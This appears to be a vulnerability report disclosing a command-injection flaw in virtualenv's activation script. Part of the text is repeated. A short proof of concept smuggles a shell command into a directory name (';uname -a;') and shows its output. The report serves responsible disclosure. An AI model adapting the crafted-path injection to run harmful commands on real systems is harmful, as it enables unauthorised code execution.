Issue
This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer.
The activation script in virtualenv is command injectable via a crafted path:
envname="';uname -a;':"
mkdir "$envname"
cd "$envname"
virtualenv .
. ./bin/activate
Linux archlinux 6.10.6-arch1-1 #1 SMP PREEMPT_DYNAMIC Mon, 19 Aug 2024 17:02:39
The execution path is low-risk since users clearly know what they are doing. However, it makes downstream attack vectors possible. More details on possible exploits of a famous downstream were disclosed to the maintainers of that project and virtualenv.
Environment
Issue
This issue was originally reported to Tidelift, with disclosure negotiated with the maintainer.
The activation script in
virtualenvis command injectable via a crafted path:The execution path is low-risk since users clearly know what they are doing. However, it makes downstream attack vectors possible. More details on possible exploits of a famous downstream were disclosed to the maintainers of that project and
virtualenv.Environment